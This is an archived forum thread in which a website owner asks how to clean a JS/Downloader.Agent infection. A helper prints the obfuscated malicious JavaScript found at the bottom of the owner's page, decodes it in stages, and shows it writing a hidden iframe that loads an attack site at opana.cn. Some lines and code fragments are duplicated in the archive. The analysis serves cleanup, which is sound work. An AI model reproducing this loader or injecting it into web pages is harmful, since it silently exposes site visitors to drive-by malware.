I have a virus that is downloading its self automatically on to users PC's the name is (JS/Downloader.Agent) i can easily remove this from my PC with the virus scanner i have.
My question is
My service provider have told me to
"About your query, if you site has a virus what we can suggest is
download all your files on your local computer
and clean it up by running an anti virus software and once detected
remove the said files from upload the webfiles
back to your webspace, there is no other source of virus on your
webspace other than from the files that was uploaded
on your server."
Now i use FileZilla as my FTP so should i download everything run the virus scanner once finished upload all the files again?
thanks for your help inadvance
James
Full Version: Virus threat
what is the address of the page on your site that contains the virus?
Take a look at the bottom of that page, you will see the following JS
this results in the following being generated
which then results in the following being generated
This loads the page http://opana.cn/opa.html?SOME_RANDOM_NUMBERS41e85636e3db
That seems to be it to me (although that URL isn't loading, I suspect it might be checking referrer (which is why the 41e85636e3db is constant) and not responding if it doesn't match.
Indeed firefox says "This web site at opana.cn has been reported as an attack site and has been blocked based on your security preferences." when you attempt to load the page and google says "This site may harm your computer."
So you just need to edit that file and remove the JS
CODE
function c72649779390m48a1e320ed560(m48a1e320edd34){ function m48a1e320ee508(){var m48a1e320eeceb=16;return m48a1e320eeceb;} return (parseInt(m48a1e320edd34,m48a1e320ee508()));}function m48a1e320ef4b1(m48a1e320efc85){ function m48a1e320f1400(){var m48a1e320f1bd4=2;return m48a1e320f1bd4;} var m48a1e320f0458='';m48a1e320f23a8=String.fromCharCode;for(m48a1e320f0c2c=0;m48a1e320f0c2c<m48a1e320efc85.length;m48a1e320f0c2c+=m48a1e320f1400()){ m48a1e320f0458+=(m48a1e320f23a8(c72649779390m48a1e320ed560(m48a1e320efc85.substr(m48a1e320f0c2c,m48a1e320f1400()))));}return m48a1e320f0458;} var z32='';var m48a1e320f2b7c='3C7'+z32+'3637'+z32+'2697'+z32+'07'+z32+'43E696628216D7'+z32+'96961297'+z32+'B646F637'+z32+'56D656E7'+z32+'42E7'+z32+'7'+z32+'7'+z32+'2697'+z32+'465287'+z32+'56E657'+z32+'363617'+z32+'065282027'+z32+'2533632536392536362537'+z32+'32253631253664253635253230253665253631253664253635253364253633253337'+z32+'2532302537'+z32+'332537'+z32+'32253633253364253237'+z32+'2536382537'+z32+'342537'+z32+'342537'+z32+'302533612532662532662536662537'+z32+'302536312536652536312532652536332536652532662536662537'+z32+'302536312532652536382537'+z32+'34253664253663253366253237'+z32+'2532622534642536312537'+z32+'342536382532652537'+z32+'322536662537'+z32+'352536652536342532382534642536312537'+z32+'342536382532652537'+z32+'3225363125366525363425366625366425323825323925326125333325333025333525333025
3334253239253262253237'+z32+'2533342533312536352533382533352533362533332533362536352533332536342536322532
37'+z32+'2532302537'+z32+'37'+z32+'2536392536342537'+z32+'34253638253364253331253336253334253230253638253635253639253637'+z32+'2536382537'+z32+'342533642533312533382533362532302537'+z32+'332537'+z32+'342537'+z32+'39253663253635253364253237'+z32+'2536342536392537'+z32+'332537'+z32+'302536632536312537'+z32+'39253361253230253665253666253665253635253237'+z32+'2533652533632532662536392536362537'+z32+'3225363125366425363525336527'+z32+'29293B7'+z32+'D7'+z32+'6617'+z32+'2206D7'+z32+'969613D7'+z32+'47'+z32+'27'+z32+'5653B3C2F7'+z32+'3637'+z32+'2697'+z32+'07'+z32+'43E';document.write(m48a1e320ef4b1(m48a1e320f2b7c));</script>
3334253239253262253237'+z32+'2533342533312536352533382533352533362533332533362536352533332536342536322532
37'+z32+'2532302537'+z32+'37'+z32+'2536392536342537'+z32+'34253638253364253331253336253334253230253638253635253639253637'+z32+'2536382537'+z32+'342533642533312533382533362532302537'+z32+'332537'+z32+'342537'+z32+'39253663253635253364253237'+z32+'2536342536392537'+z32+'332537'+z32+'302536632536312537'+z32+'39253361253230253665253666253665253635253237'+z32+'2533652533632532662536392536362537'+z32+'3225363125366425363525336527'+z32+'29293B7'+z32+'D7'+z32+'6617'+z32+'2206D7'+z32+'969613D7'+z32+'47'+z32+'27'+z32+'5653B3C2F7'+z32+'3637'+z32+'2697'+z32+'07'+z32+'43E';document.write(m48a1e320ef4b1(m48a1e320f2b7c));</script>
this results in the following being generated
CODE
if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%37%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6f%70%61%6e%61%2e%63%6e%2f%6f%70%61%2e%68%74%6d%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%30%35%30%34%29%2b%27%34%31%65%38%35%36%33%36%65%33%64%62%27%20%77%69%64%74%68%3d%31%36%34%20%68%65%69%67%68%74%3d%31%38%36%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;
which then results in the following being generated
CODE
<iframe name=c7 src='http://opana.cn/opa.html?'+Math.round(Math.random()*30504)+'41e85636e3db' width=164 height=186 style='display: none'></iframe>
This loads the page http://opana.cn/opa.html?SOME_RANDOM_NUMBERS41e85636e3db
That seems to be it to me (although that URL isn't loading, I suspect it might be checking referrer (which is why the 41e85636e3db is constant) and not responding if it doesn't match.
Indeed firefox says "This web site at opana.cn has been reported as an attack site and has been blocked based on your security preferences." when you attempt to load the page and google says "This site may harm your computer."
So you just need to edit that file and remove the JS
Thanks for your help Stephen it is greatly appreciated. Unfortunately this has flown rigfht my head.
what file do i need to amend and what do i change it to...
what file do i need to amend and what do i change it to...
well if anyone can explain what exactly is this js downloader? I see this in many websites which i visit, kaspersky jst blocks it - would it harm if i turn off the anti virus when visiting the site?
Well you can download all the files and run a virus scan and see if it founds a virus or more. If it does find one just delete it off your web site. No need to upload all the files back just delete the ones that have a virus.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.